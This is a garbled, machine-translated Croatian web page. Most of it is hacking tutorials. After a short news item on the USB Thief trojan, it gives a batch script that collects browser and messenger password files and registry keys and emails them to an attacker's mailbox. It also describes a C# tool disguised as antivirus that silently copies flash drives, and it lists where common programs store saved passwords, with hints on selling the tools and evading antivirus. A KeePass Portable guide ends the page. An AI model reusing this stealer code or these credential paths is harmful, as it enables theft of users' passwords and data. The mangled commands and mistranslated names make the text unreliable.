Najjednostavniji grabber. Trojan USB lopov ne ostavlja tragove i radi na flash diskovima kako ukrasti podatke putem USB flash pogona i registra
Izuzetno neobičan Troyan: Malwar je primio ime USB lopov (Win32 / psw.stealer.nai). Malname je usmjeren na krađu podataka, primjenjuje se i radi na običnim flash diskovima, kao i vješto skriva tragove njegove prisutnosti u sustavu. Troyan je idealan za cybershpionage, jer je u mogućnosti doći čak i biti izoliran iz mrežnih sustava, ako ih možete povezati s USB pogonom.
Za razliku od drugih USB prijetnji koje su napisane na autoload i lažne aplikacije prečaci, tako da je malvar pokrenut, USB lopov djeluje drugačije. Trojanov rad je dizajniran za činjenicu da se korisnici često pohranjuju na Flash pogonima Prijenosni verzije takvih aplikacija kao što su Firefox, Notepad ++, TrueCrypt i tako dalje. Malwar je uredno ugrađen u lanac preuzimanja takvih programa, koji se izdaje za dodatak ili dll datoteku. Dakle, kada korisnik pokrene poznatu aplikaciju s flash pogona, zajedno s njim (u pozadini), Troyan je lansiran.
Nepoznati autor Malvive zlostavljao je ozbiljnu zaštitu za njegov razvoj. USB lopov je vezan za svaki zaraženi flash pogon koristeći svoj jedinstveni ID i pogonske parametre. Dio trojanskih datoteka zaštićen je AES128 enkripcijom, s ključem generira upravo na temelju jedinstvenih parametara uređaja. Također, malvari nazivi datoteka se brinu u svakom slučaju: generiraju se na temelju sadržaja flashplay i vremena za stvaranje datoteka. Kada pokušavate kopirati USB lopov na drugi flash pogon ili redoviti tvrdi disk, ovaj dvostupanjski sustav zaštite neće dati MALVARI za zaradu, a također ozbiljno komplicira ponašanje obrnutog inženjeringa.
Struktura trojana
USB lopov radi izravno iz flash pogona i ne ostavlja trag u samom sustavu. Trojan se sastoji od šest dosjea, od kojih su četiri izvršne, a još dva sadrži konfiguracijske podatke. Prvi utovarivač je odgovoran za lansiranje trojana zajedno s prijenosnom verzijom bilo kojeg programa. Provjerava USB uređaj i osigurava da ga mogu snimati ukradene informacije i pohraniti ovdje. Tada počinje drugi utovarivač. On provjerava imena roditeljskih procesa i osigurava da radi u zajedničkom okruženju (i nitko ga ne pokušava analizirati). Treći utovarivač, zauzvrat, provjerava prisutnost u antivirusnom sustavu.
Posljednji, četvrti PAILAD, koji je ugrađen u proces rada, odgovoran je izravno za krađu podataka. USB lopov oteti dokumente, slike, popis datoteka sa svih dostupnih diskova, podaci o registru sustava Windows i informacije prikupljeni pomoću Winadit. Svi ukradeni podaci spremljeni su na flash pogonu i šifrirani su pomoću eliptičke kriptografije.
ESET stručnjaci napomenuti da napadi koristeći USB lopov ne mogu se nazvati uobičajenom praksom. Ipak, Troyan je vrlo opasan, jer je teško detektirati njegovu prisutnost, a nakon izvlačenja USB pogona, ne ostaju svi tragovi izbora informacija. Također u izvješću Društva navodi se da autor Malvarija, po želji može "ponovno napuniti" svoju zlobnost, zamjenjujući diyiload za krađu podataka o bilo kojem drugom maluralu.
U ovom članku ću opisati što je brže i bez mnogo poteškoća, pisati i napraviti datoteke fokus virus lozinkom i slanje sve na poštanski sandučić.
Počnimo s činjenicom da će virus biti napisan na BAT-u "E (cmd, glavne naredbe koje možete uzimati) da je u uobičajenoj tekstualnoj datoteci i bit će izvršena korištenjem standardnog, ugrađenog rotora sustava Windows-" naredbena linija ".
Da biste napisali sličan virus, morate znati točnu lokaciju za pohranu tih datoteka koje će i će ukrasti, cot componente koje se mogu preuzeti s web-lokacije http://www.blat.net/ ili s našeg poslužitelja, Kao i komponenta iz WinRar Archiver Raar.exe (možete bez njega).
Otvorite notepad i kopirajte sljedeći kôd:@echo off MD% SystemRoot% Winc MD% SystemDrive% Pass MD% SystemDrive% Pass Opera MD% SystemDrive% Pass Mozilla MD% SystemDrive% Pass MailSDrive% Pass MailAgent Reg atrib% Systemroot% Winc + H + S + R Atrib% SystemDrive% Pass + H + S + R Kopiranje / y "% Systemroot% \\ tlat.exe"% Systemroot% \\ Cowin.exe "Kopija / Y "% Systemroot%"% Systemroot% Winc.dll "Kopiranje / y"% Systemroot% \\ blaga.Lib ""% Systemroot% Winc.Lib "CD / D% AppData% \\ t Opera Opera Copy / y Wand.Dat% SystemDrive% Pass Opera Wand.dat Kopiraj / Y Cookies4.dat% SystemDrive% Pass Opera Cookies4.da Regedit.ex -A% SystemDrive% Pass \\ t MailAgent Reg.reg "HKEY_CURRENT_USER Software.ru Agent Magent_logins2 regedit.exe -A -e -A% SystemDrive% \\ Reg MailAgent Reg_3.reg" HKEY_CURRENT_USER Software.ru Agent Magent_logins3 CD / D% AppData% Xcopy Mra temelj% SystemDrive% Pass MailAgent / K / h / l / q / q / r / S / S / S / e\u003e Nul Xcopy MRA.Txt.txt% SystemDrive% Pass mailagent / K / h / g / q / r / s / y\u003e Nul CD% AppData% Mozill Profili Firefox \\ tPanation / y Cookies.SQLite% SystemDrive% Pass Mozilla Cookies.SQLite Kopiraj / Y Key3.db% SystemDrive% Pass Mozilla Key3.db % SystemDrive% Pass Mozilla Spons.SQLite Copy / Y% WindIr% Rar.exe% SystemDrive% Pass \\ RAR.Exe\u003e NUL del / s / q% sisteroot% rhar.exe% SystemDrive% Pass Raar.exe -R% SystemDrive% Pass.Rar% SystemDrive% Pass Pass / y% SystemDrive% Pass.Rr% Systemroot% \\ Winc \\ WINCS \\ t % Systemroot% \\ clat.exe-instaliranje -werver smtp.yandex.ru -port 587 -f [email protected] -u Login -Pw lozinka Ren * .rar Pass.Rr% Systemroot% \\ t -DodayPassword -to [email protected] -ttach% sistemroot% winc pass.rar rmdir / s / q% SystemDrive% Pass RMDir / S / q% Systemroot% \\ t Blot. Exe del / s / q% SystemRoot% Blot.dll del / S / q% SystemRoot% \\ godinu Blat.lib Atrib + A + S + H + R% Systemroot% \\ 'Exe Izlaz CLS
Ne mnogo toga napisati kod samog Batinke.
@echo off - skriva tijelo Batinka (tako da nije potrebno, ali i dalje)
mD% Systemroot% Winc - stvara mapu Wincs u mapi Windows System bez obzira na to koji je disak instaliran ili kao što je imenovan.
mD% SystemDrive% Pass \\ - stvara mapu prolaza na disku gdje je instaliran sustav Windows.
mD% SystemDrive% Pass Opera - stvara operu mapu u kojoj će se u budućnosti kopirati s opere preglednikom (do 11 * verzije opere pohranjuje vaše lozinke u Wand.dat datoteci)
- Stvara mapu Mozilla u kojoj će se datoteke iz Mozilla preglednici nastaviti kopirati (kolačiće.SQLite, Key3.db, Signons.sqlite) u koje se lozinke pohranjuju.
mD% SystemDrive% Pass MailAgent \\ - Stvara mapu MailAgent na koju će se kopirati datoteke koje sadrže povijest korespondencije i ključeve registra (tipke za lozinku) iz agenta za mail.
mD% SystemDrive% Pass MailAgent Reg - stvara mapu Reg
aTTRIB% Systemroot% Winc + H + S + R - Stavlja atribute u mapu u zrakoplovu i time ga skrivaju iz očiju.
atrib% SystemDrive% Pass + H + S + r - isto kao i gore.
kopiraj / y "% sistemroot% cvat.exe"% sistemroot% winc clat.exe " - kopira datoteku Blat.exe od istovara u mapu Wincs
kopiraj / y "% sistemroot% cvat.dll"% sistemroot% winc cval.dll " - kopira datoteku Blat.dll iz istovara u mapu Wincs
kopiraj / y "% sistemroot% cvat.lib" "% sistemroot% winc cvat.lib" - Kopira datoteku Blat.lib iz mjesta čep u mapi Wincs
CD / D% AppData% Opera Opera - ulazi u operu mapu gdje se nalaze datoteke s lozinkama (i ne samo) iz opere.
kopiraj / y Wand.Dat% SystemDrive% Pass Opera Wand.dat - kopira datoteku wand.dat u mapu Opera
kopiraj / Y Cookies4.dat% SystemDrive% Pass Opera Cookies4.dat - kopira kolačiće4.dat datoteke u Opera mapu
regedit.exe -A -e% SystemDrive% Pass \\ Reg mailagent Reg.reg "HKEY_Current_user Software.ru Agent Magent_logins2 - Izvezite magent_logins2 ključ registra gdje se lozinka pohranjuje u mapi Reg
regedit.exe -A% SystemDrive% Pass \\ Reg mail.reg "HKEY_CURRENT_USER Software.ru Agent Magent_logins3 - Izvezite magent_logins3 registar u kojem je lozinka pohranjena u mapi Reg
CD / D% AppData% - Idite na mapu AppData
Xcopy MRA temeljna% SystemDrive% Pass MailAgent / K / h / g / q / r / S / Y / e\u003e Nul - kopira sadržaj MRA temeljne mape u mapi MailAgent
Xcopy MRA.Txt mail% SystemDrive% Pass MailAgent / K / h / h / q / r / r / s / y\u003e Nul - kopira datoteku VER.TXT u mapu MailAgent
cD% AppData% Mozilla Firefox Profili \\ t - Idite na mapu s profilom preglednika Mozilles
kopiraj / Y Cookies.SqLite% SystemDrive% Pass \\ Mozilla Cookies.SQLite - Kopira datoteku kolačiće.SqLite u mapu Mozilla
kopiraj / y Key3.db% SystemDrive% Pass Mozilla Key3.db - kopira datoteku Key3.db u mapu Mozilla
kopiraj / y Spinovions.sqLite% SystemDrive% Pass Mozilla Spisys.sqLite - Kopira datoteku Signons.sqLite u mapu Mozilla
kopiraj / y% windr% r.exe% SystemDrive% Pass \\ rar.exe\u003e \u200b\u200bNul- Kopira Komponenta Archiver za WinRar Rar.exe na mapu Pass
del / s / q% sistemroot% rhar.exe - Briše archiver komponentu iz mape Windows
% SystemDrive% Raar.exe A-R% SystemDrive% Pass.Rar% SystemDrive% Pass \\ t- arhivirajte sadržaj prolazne mape
kopiraj / y% SystemDrive% Pass.Rr% Systemroot% Winc Pass.rar Kopirajte izradu arhive na mapu Wincs
cD% Systemroot% Winc - idite na mapu Wincs
% Systemroot% \\ clat.exe-instaliranje -werver smtp.yandex.ru -port 587 -f [email protected] -u Login -PW lozinka - priprema program za slanje arhive koji označava podatke za autorizaciju i slanje slova. Ne zaboravite navesti podatke iz poštanskog sandučića, odakle slovo će biti poslano s arhivom.
ren * .ra Pass.Rar - Samo u slučaju, ako arhiv nije prihvatio pogrešno ime tijekom tečaja, preimenovali smo ga na pass.rar
% Systemroot% Winc cvat.exe -dy datoteka lozinku-to [email protected]. --Tatch% Systemroot% Winc Pass.rar - Navedite koju će poštanska adresa poslati pismom i poslati ga.
rMDIR / S / q% SystemDrive% Pass - Brisanje mape Pass
rMDIR / S / Q% Systemroot% \\ t - Izbrišite mapu Wincs
del / s / q% sisteroot% clat.exe
del / s / q% sistemroot% clat.dll - Izvadimo komponente Blat iz mape Windows.
del / s / q% sistemroot% clat.lib - Izvadimo komponente Blat iz mape Windows.
aTTRIB + A + S + H + R% Systemroot% \\ t - Stavljamo atribute na isti način skrivaj se od očiju.
EXIT - dovršite proces i izlaz Batinke.
cLS - očistite izlaz svih redaka u Immoderu.
Kopiran, spremanje kao Wind.bat i sastavljajte u Exe pomoću programa Exe Converter, a zatim skupljamo sve u gomilu, to jest, uzimamo komponente Blat programa i WinRAR Archiver Componentu (možete preuzeti) i ljepilo Jedna izvršna datoteka, ili s kojim programom, put istovara svih falamika treba biti% sistemroot% ili% Windowsdir% ili% windr%.
Kao rezultat toga, dobivamo virus koji neće proći po antivirus i će poslati arhivu s datotekama na poštu. Datoteke koje će doći na poštu mogu se dešifrirati pomoću višestrukog oporavka lozinke, to nije sve, ali samo Wand.dat iz opere, a zatim ako se ne ažurira na 11 * verzije. Sve ostale datoteke mogu se dešifrirati zamjenom vlastite.
Na to mislim da možete završiti, ako imate bilo kakvih pitanja, ne ustručavajte se pitati.
Hvala vam na pažnji, sve je dobro!
© swap theheckworld.in.
Za jednostavne smrtne flash diskove - to je uređaj za prijenos dokumenata / filmova / slika i drugih osobnih (a ponekad i vrlo osobnih) informacija. Ali za hakere, flash pogon je u isto vrijeme žrtva, i borbeni alat. Danas ću vam reći sve suptilnosti nevidljivog odljeva podataka iz flash diskove na moje računalo, kao i poučavati kako biste okrenuli neškodljive flash diskove za sigurnosne kopije lozinki iz "velikog" računala.
Puni flash pogoni
Ideja programa "Zli Comp" program će biti kako slijedi. Razvit ćemo mali alat koji će se pretvarati da je Super Mega Advanced Antivirus, čija je svrha kvalitativno uklanjanje iz "opasnih" virusa iz flash diskova. Nitko neće iznenaditi bilo koga zaražena bljeskanim virusima, tako da naš specijalizirani "antivirusni" neće uzrokovati strahove o lakovjernim korisnicima. Naprotiv, umetanje flash pogona u računalo i vidite vrstu poruke: "Otkriven je virus. Napravim detaljno skeniranje svih datoteka za prisutnost zaraženih »- On će svakako pričekati završetak ove operacije.
Priprema instrumenata
Napišite tako koristan program koji ćemo sada biti na trendovskom c #. Jezična fleksibilnost i funkcionalnost široke platforme. Omogućuje vam da razvite aplikacije s brzinom munje. To je ono što nam treba. Zainteresirani smo za usjev koji možemo prikupiti, a ne teding proces kodiranja.
Jedna od važnih komponenti naše primjene bit će sučelje. Što to više činite, to više šanse da žrtva neće primijetiti trik i mirno očekuju završetak antivirusnog skeniranja. Nisam osobito pari i objavio sliku i napredak u obliku čistog projekta. Možete oduzeti od punog i napraviti prekrasan dizajn. Savjetujem vam da vidite izvršenje neke stvarne antivirusne i otprilike u istom stilu za izdavanje vaše prijave.
Stavili smo zadatak
Pretpostavljamo da smo odlučili s organizacijskim pitanjima i algoritmom djelovanja, vrijeme je da razgovaramo o tehničkim nijansama. Dakle, naš anti-virus treba započeti svoj prljavi rad tijekom instalacije flash pogona. Čim se novi disk pojavi u sustavu, naš program mora odrediti svoje pismo i početi kopirati.
Prije nego što sam se obvezao napisati ovaj članak, izvorni kod sličnog programa uhvatio mi je oči. Autor primjera odredio je činjenicu prisutnosti flash pogona povremenim gašenjem svih diskova za prisutnost "prijenosnog srednjeg tipa". Isprva sam mislio ići na isti način, ali unutarnji glas je predložio u iracionalnosti. Imajući sve "za" i sve ", to je na", bacio sam tu ideju i otišao hodati na MSND. Pet minuta kasnije ispostavilo se da nisam to učinio uzalud. Odgovor je pronađen!
Bez wrapi nigdje ...
Možete naučiti učinkovitije na spajanje nove opreme (u našem slučaju - flash pogoni) hvatanjem i analizom poruke WM_Devicechange. Tijekom instalacije uređaja poruka se šalje svim prozorima, a mi ga lako možemo obraditi u vašoj prijavi. Za to je dovoljno samo opisati funkciju Windowproc. U praksi izgleda ovako:
Lresult callback Windowproc (hwnd hwnd, // UINT UMSG prozorski ID, // WPARAM WPARAM Identifikator poruke, // Događaj koji se dogodio LARAM LPARAM // pokazivač na strukturu koja sadrži podatke)
U tijelu funkcije morate usporediti vrijednost WPRAM parametra s identifikatorima raznih događanja vezanih uz WM_Devicechange. Za naš primjer, to će biti:
U redu, kako uspostaviti činjenicu povezivanja nove opreme, znamo, ali kako biti sigurni da ste spojili flash pogon? Uređaji s mogućnošću "vruće veze" (ja sam o USB) ogroman set (pisač, skener, modem, itd.). Srećom, i ovaj problem je riješen vrlo jednostavan. U parametrom LPAM-a možemo se odnositi na strukturu _Dev_Boads_hdr, koja ima polje DBCH_DEVICETYPE. To se temelje na vrijednosti, to su polja i izvršeni su odgovarajući zaključci. Ako je jednaka dev_devtyp_volume, onda je vrijeme za pridruživanje i pobijediti ruke - flash pogon je povezan s nama!
TypeDef Struktura _Dev_broadScast_hdr (dbch_size; // DWORD DBCH_DEVICETYPE Struktura veličina; // DWORD DBCH_RERVER; // rezervirano, rezervirano, ne koristi se) dev_broadcast_hdr, * pdev_broadcast_hdr;
U našoj maca umetnuo flash pogon, "pokušat ćemo prepoznati slovo diska da je sustav otišao. Kao u "polju čuda", možete to potaknuti, ali bolje je povući informacije iz konstrukcije dev_broadcast_volume.
TypeDef struktura _Dev_broast_volume (DWORD DBCV_SIZE; // DWORD DBCV_DEVICETYPE STRUKTRU STRUKTURE; // DWORD DBCV_Reservered Tip Uređaj; // rezervirani DRD DBCV_UNITMASK; // Bitni maski slovo Riječ dbcv_flags; //) dev_broadcast_volume, *
Od svih polja ove strukture, zainteresirani smo za DBCV_UNITMASK. Imajte na umu da ova nekretnina sadrži samo bit slova, a ne njegove simboličke performanse. Na primjer, ako je vrijednost 0, pogonsko slovo će biti; Ako je 1, onda b, itd. Za praktičnost dobivanja slova, najbolje je napisati funkciju.
Ako već dugo čitate naš naslov i upoznat je s API funkcijama, onda u čitanju sljedećeg dijela članka nema potrebe. Otvorite urednik i započnite aplikaciju. Opisao sam sve potrebne strukture i funkcije; Možete ih skupiti u programu. Definirajte i započet ću uranjanje v.net i C # posebno.
Stay.net "Om.
Vrijeme je za vježbanje i primjenu znanja na C # jezik. - Što je? - Pitaš te. "Stalls je rekao o Whapima, a onda sam samo glupo odlučio napraviti poziv za sve funkcije u obliku izvornog koda? Gdje je navedena brzina razvoja munje? ".
U nešto u pravu. Naša aplikacija će stvarno koristiti Wrapi funkcije (to je lakše), ali ih nećemo opisati. Mnogi su programeri suočili s problemom definiranja flash diskove. Kao rezultat ovih skenova, počeo se pojavljivati \u200b\u200bslobodne klase za C #, u kojoj je već provedena sva potrebna funkcionalnost. Samo moramo povezati takav radni komad (pročitajte komponentu) na svoj projekt i uzrokovati par metoda. Sada ćemo koristiti jednu od ovih razreda. No, znanje o gore opisanim strukturama, bit ćete korisni za vas prilikom prijenosa ovog programa na Windows API.
Spreman nastave odlučuju takve zadatke, veliki set, ali mi se svidjelo mogućnost od Jan Dolinaya. Ova osoba je napisala vrlo jednostavan za korištenje i razumjeti kod klase DriveTettor, koji može:
I što je najvažnije, s ovim razredom je iznimno lako raditi - u tome ćete sada biti sigurni. Povezivanje klase na svoj projekt provodi se na standardni način, a ne zaustavlja se u tom smislu. Stoga se odmah krenemo na inicijalizaciju. To je učinjeno ovako:
Flashdrivetetector \u003d novi DriveTetter (); chemiddriveteltector.devicearrived + \u003d novi drogetePethementHandherdher (principearrived); Chemidriveteltector.deviceremoved + \u003d novi DroveTetherHandHandHandher (ondrivemored);
Nakon stvaranja instance objekta klase DriveTettector, definiram deviearrived () i drivemed () rukovatelji događaja. Prema njihovom imenu, nije teško pogoditi što oni odgovaraju. Svi inicijalizacijski kod najbolje je napisan na način Form1 (). Glavni kodeks našeg programa bit će u dericearved događaj rukovatelj. Vidjet ćete njegov tekst o kucanju:
String DirName \u003d okoliš.GetCommandlineartgos () + "Flash_" + DateTime.Now.Tostring ("DD-MM-YH-MM-SS"); Knjigovodnica (DirName); Xdirectory flashcopier \u003d nova xdirectory (); Flashcopier.indexComplete + \u003d novi indekscompleteevevendler (indekscompleat); Flashcopier.itemcopied + \u003d novi proizvodicopiedevenlandler (stavkacopied); Flashcopier.copyCocomplete + \u003d novi copycompleteEEvevenlandler (copycomplete); Flashcopier.source \u003d novi imenik (e.drive.Tostring ()); Flashcopier.destinion \u003d novi imenik (DirName); Flashcopier.Overwrite \u003d True; Flashcopier.Folderfilter \u003d "*"; Flashcopier.filefilters.addd ("*. Doc"); Flashcopier.filefilters.adddd ("*. Xls"); // definiranje drugih filtara // .... Flashcopier.Startcopy ();
Na samom početku unosa definirat ću put do mape u kojoj ćemo kopirati sadržaj flash pogona. Kopija će biti u imeniku "Flash_Text", koji se nalazi s mapom iz koje je naša aplikacija radi tako prikladnije. Odlučivanje s nazivom mape, pokušavam ga stvoriti pomoću funkcije CILiRERY (). Napisao sam ovu značajku isključivo za praktičnost. Pojavljuje se u njoj na instancu imenac mjesta, dizajniran za rad s direktorijama i nazovite svoj način stvaranja metode (), koji stvara novu mapu.
Nakon izrade mape možete kopirati. Kopirat ću sve datoteke pomoću objekta tipa Xdirectory. Ako upišete kôd sami, onda kada pokušate sastaviti kompajler, kompajler će proizvesti pogrešku u kojoj će se reći crna bijela: "Cilj ovog tipa nije pronađen."
Činjenica je da je Xdirektory treća klasa. Jednom sam to davno pronašao na Internetu Ineta i od tada često često koristim u svojim projektima. Sviđa mi se to u činjenici da je dovoljno pozvati jednu metodu za kopiranje uloženih mapa. Osim toga, omogućuje vam da instalirate filtre.
Stvarno bez njega. Uzimamo standardne nastave, dobro poznate sve programere recepcije - rekurzija - i napišite nekoliko desetaka linije koda. Nažalost, ne želim to učiniti kategorično. U dvorištu XXI stoljeća morate optimizirati svoje postupke i xdirectory kako bi nam pomogli u tome.
Modul s klasom leži na našem disku, a možete naučiti o svrsi metoda / nekretnina / događajima gledajući odgovarajuću tablicu.
Svojstva klase xdirectory
Metode klase xdirectory
Pokušajte pokrenuti našu aplikaciju i umetnite USB flash pogon. Nakon nekoliko sekundi (ovisno o klinčićima vašeg flash pogona), cijeli sadržaj USB pogona preselio se u mapu iz koje ste pokrenuli svježe pečenu primjenu.
USB Grabber.
Sada razmotrite suprotan zadatak i razgovarajte o nijansima stvaranja tzv. Flashki grabber. Načelo stvaranja istog. Morate napisati jednostavnu aplikaciju koja će se automatski početi nakon instalacije flash pogona.
Tijekom operacije, zahtjev će biti opaki ključne riječi registra / ključne riječi u kojima popularni programi pohranjuju spremljene lozinke i mogu se kopirati na jednu od njihovih mapa što je više moguće. Da bi vaš automobilski direktor izazvao sumnju na siromašnog korisnika, brinite da ga temeljito pričvrstite. Na primjer, u izborniku za pokretanje.
Vjerojatno ste svjesni da je takozvana prijenosna verzija aplikacija sada postala vrlo popularna, to jest, programi mogu raditi izravno iz flash pogona. Ovo je najbolje igrati. Formiranje programa u odgovarajućem stilu i za istinitost, izbacite nekoliko gumba dizajniranih za pokretanje bilo kojeg programa. Opcija dizajna prikazana je na slici.
Kako ćemo opljačkati?
Odmah ću reći da su super-hakerne akcije ne trebaju učiniti ovdje. Većina programa pohranjuje osobne podatke u dokumentima i postavkama Korisnička aplikacija podataka% ili u registru. Pod programskom imenom podrazumijeva svaki program. Ako naiđete na prvu opciju, morat ćete koristiti već poznatu klasu Xdirectory (ili standardne metode rada s datotekama) i kopirajte sve što vam je potrebno. U drugom slučaju, morat ćete raditi s Registrom. Primjer datoteka za kopiranje neće se nositi (već razmišljali), ali kako komunicirati s Registry Alati .NET - sada ću se prikazati (na primjeru određivanja puta do mape TC):
Registrykey ReachKey \u003d Registry.Currentuser.opengubkey ("Softver \\ tPauletter \\\\ commander"); Tipka za string \u003d (string) čitanje.GetValue ("installdir");
To je sve. Kod više neće. Ove znanje trebalo bi biti dovoljno da povučete datoteke s vrijednim informacijama. Da biste napravili mali zadatak olakšanja, pripremio sam popis najpopularnijih programa i oslikao sve putove kojima pohranjuju spremljene korisničke podatke.
Mail.agent
Mail.ru Messenger je sada vrlo popularan među običnim smrtnim korisnicima (osobito u ženki). Ciljevi su jasni, zadaci se isporučuju, tako da smo zainteresirani za:
gtalk.
Društvo Google Stvara prikladne i funkcionalne proizvode, među kojima se nalazi gabber klijent - gtalk., Danas gtalk. Nije jako popularan. Na svakom drugom računalu nije instaliran, ali ponekad se i dalje nalazi i da bude u temi, bolje je odmah naučiti naš program da biste dobili lozinke i iz ovog mesianger. Lozinke iz svih GTalk Računa u registru - Hhey_Current_user Software Google \\ t U ovoj niti, svi računi su navedeni pod kojim je ulaz ikada napravljen gtalk., Lozinke na račun snimljene su u parameru PW niza.
Ukupni zapovjednik.
Ukupni zapovjednik. - Svakako, najpopularniji upravitelj datoteka. Funkcije u programu sadrži približni automobil i malu kolibu (i koliko se više može montirati s dodatnim dodatkom). Zainteresirani smo samo u ugrađenom FTP klijentu. Ona koristi mnoge i lozinke, naravno, zadržati.
TC Za razliku od mnogih drugih programa ne pohranjuju lozinke u registru, a stare dobre INI datoteke koriste. Lozinke, kao i sve potrebne podatke za povezivanje s poslužiteljima (IP, port, korisničko ime, itd.) Ukupni zapovjednik. Trgovine u datoteci wcx_ftp.inikoji se nevino nalazi u mapi programa. Put do imenika u kojem je instaliran Ukupni zapovjednik.Možete učiti iz registra. U hkey_current_user Software Ghisler ukupno zapovjednika grana.
Firefox.
Danas preglednik nije samo program za web putovanja, već cjelinu kombiniranje, koji uz različite mogućnosti čuva mnogo povjerljivih informacija. Tipičan primjer je web obrazac. 99% modernih mjesta zahtijeva registraciju. Zapamtite i stalno držite u glavi Prijava / lozinka za svaku stranicu - zadatak je nestvaran, pogotovo ako ste napredni korisnik i surfanje Interneta, niste ograničeni na jedan "kolege" i "Vkontakte".
Programeri su olakšali život korisnika i ugradili takozvane "lozinke repozitorije" u programima. Registrirao sam se, otišao sam pod moj račun, naredio pregledniku da zapamti vjerodajnice - i zaboravio. Sljedeći put kada ste posjetili samo nekoliko klikova mišem, a vi ste već na web-lokaciji. Budući da preglednik zadržava lozinke, to znači da imamo priliku povući svu svoju bazu.
Sve ove datoteke se nalaze u vašem već poznatom dokumentu i postavkama% korisničko ime% aplikacijskih podataka Mozilla Firefox Profile% Profil Naziv profila%.
Opera.
Opera. - Preglednik, koji je vrlo popularan među ruskim korisnicima. Naravno, ne možemo ga ostaviti bez pozornosti. Dakle, s operom situacija je približno ista kao i kod Firefoxa. Sve lozinke pohranjene u pregledniku pohranjuju se u dokumentu i postavke% Korisničko ime% aplikacijskih podataka Opera profila u Wand.dat datoteci. Ispada, kada se otkrije opera, mi ćemo djelovati kao iu slučaju Firefox..
Skype.
Popularnost Skypea raste svaki dan. Mnogi se koriste ne kao sredstvo za upućivanje poziva, već za banalni zgodan chat. Svi intimni podaci, kao što biste trebali očekivati, nalaze se u korisničkom profilu (tamo, gdje pohranjuju svoju operu ili FF). Za njihovu "privatizaciju" će morati kopirati profil korisnika iz dokumenta i postavki% korisničko ime% aplikacijskih podataka \\ i izvoz registarske grane - HKEY_Current_user Software Skype zaštićeno.
Qip.
Kao i većina prethodno opisanih programa, Qip sve spremljene lozinke pohranjuje u aplikacijskim podacima.
Kopiranje je dovršeno
Tehnologija .NET snažno pojednostavljuje zadatak, kao posljedica kojih je cijeli kodiranje izrezano u poziv na nekoliko metoda. Vi, naravno, možete reći da nije cool i da su takve stvari učinkovitije pisati na whapi ili asm "e. U nečemu, slažem se s vama, ali uzimajući u obzir, na Whapi i, štoviše, na ASME Pisati takav program tako da neće biti u stanju brzo brzo. Dok drugi napišu kôd kilometara, prikupit ćemo žetvu. Sretno u programiranju, a ako imate bilo kakvih pitanja, - pitam vas, pišemo na sapun.
Ne zaboravite, mnogi korisnici pohranjuju povjerljive informacije u mapi Moji dokumenti. Najmanje mogu biti zanimljivi radni dokumenti, a ponekad i cijele datoteke s lozinkom. Ja u moje vrijeme (na bivšem radu) otkrio sam urednu formatiranu datoteku s lozinkom klijentima na odjeljku.
Kao pravi prijatelj, trebali biste pomoći svim tim ljudima s sigurnosnom kopijom svojih povjerljivih informacija.
Na mnogim hakerskim forumima, mnogi oglasi za prodaju ove vrste softvera. Različite cijene - od $ 10 do $ 100, Poboljšanje primjera koji se razmatraju u članku, možete zaraditi na kori crnog kruha s kavijarom. Ponavljam, glavno je kreativno otići u slučaj i sve će definitivno raditi. Opet, antivirusi nisu otkriveni;).
Upozorenje!
Ovaj program koristimo isključivo za pravovremenu sigurnosnu kopiju sadržaja flash pogona na disk i sigurnosne zaporke na USB flash pogonu. I što ste mislili? Ilegalna uporaba takvog softvera je kažnjiva!
Mnoge tvrtke, uključujući Sony i Adobe, već su postale žrtve hakera koji su ukrali milijune lozinki i drugih korisničkih podataka. Analiza tih informacija pokazala je da mnogi korisnici često koriste ili nepouzdane lozinke poput "123456", ili iste lozinke za mnoge usluge. Izuzetno olakšava hakere svog zadatka, a istodobno se takva nepažnja može shvatiti: tko se može sjetiti više od desetak teških lozinki?
Jednostavno rješenje može biti komad papira zalijepljen ispod tipkovnice. Nijedan haker ne može jesti na njega, ali ćete morati stalno pratiti ljude koji se nalaze u blizini vašeg računala. A s ove ploče nema smisla ako želite unijeti svoj račun s nekim drugim računalom.
Besplatno Curess 2 Prijenosni alat rješava ovu dilemu. Za svoj rad trebat će vam samo USB flash pogon s 10 MB slobodnog prostora na koji instalirate pomoćni program. U budućnosti ćete morati zapamtiti samo jednu lozinku - od zaštićenog područja flash pogona. Uostalom, drži KeepASS podataka unijeti vaše web-usluge u obliku kodirane banke podataka zaštićene glavnom lozinkom.
Troyans, uzimanje lozinki, neće biti u stanju podići ništa. Budući da više ne morate držati u sjećanju na desetke lozinki, možete koristiti novu za svaku web uslugu, stvarno pouzdan lozinku. Sada ćemo vam detaljno reći kako koristiti Hotels.
Kako to učiniti
1 Ugradite sigurnosnu lozinku
Ugradite sigurnosnu lozinku
Umetnite USB flash pogon na računalo, stvorite novu mapu na njemu i kopirajte sadržaj arhive s softverom KeePass tamo. Pokrenite program klupce.exe. Nakon pokretanja, aktivirajte automatsko traženje ažuriranja klikom na skočnom prozoru da biste "omogućili". Zatim odaberite "Prikaz | Promijenite jezik i kliknite "Get više jezika".
Preuzmite ruski jezik datoteku s mjesta otvaranja klikom na «Rus 2.25+. " Raspakirajte sadržaj arhive na USB pogon. Ponovno kliknite na "Prikaži" Promijenite jezik, "Odaberite" ruski "i ponovno pokrenite KeepSass pritiskom na gumb" YES ".
2 Stvorite novu bazu podataka za zaporku
Stvorite novu bazu podataka za zaporku
Odaberite "Datoteka | Novi "i navedite USB pogon kao pohranjivanje lozinke. U sljedećem prozoru program će vas zatražiti da postavite glavnu lozinku. Morat će se unijeti svaki put kad se kreće.
3 Aktivirajte zaštićeni način
Aktivirajte zaštićeni način
Trojanu nije mogao računati vašu lozinku za Keepsy, trebali biste koristiti zaštićeni programski način, sličan UAC-u u sustavu Windows 7. Da biste to učinili, idite na Keepsa na "uslugu | Postavke | Sigurnost ", pomaknite se na dnu prozora i označite okvir pored" Unesite glavnu lozinku u sigurnom načinu rada ".
4 Ispunite lozinke baze podataka
Ispunite lozinke baze podataka
KeePass može sortirati lozinke po skupinama. Prema zadanim postavkama, imate takve grupe kao "OS" ili "Internet" u vašoj novoj lozinkama banke. Da biste stvorili novi unos, odaberite odgovarajuću skupinu (ili stvorite novu), kliknite na bijelo područje na desnoj strani s desnom tipkom miša, a zatim - do "dodajte zapis".
Ispunite sva polja i kliknite U redu. Budući da više ne morate pamtiti zaporke za unos svakog računa, možete postaviti nove, složenije, što se može generirati, na primjer, na web stranici Passwort-generator.com.
5 Koristite automatsko odobrenje
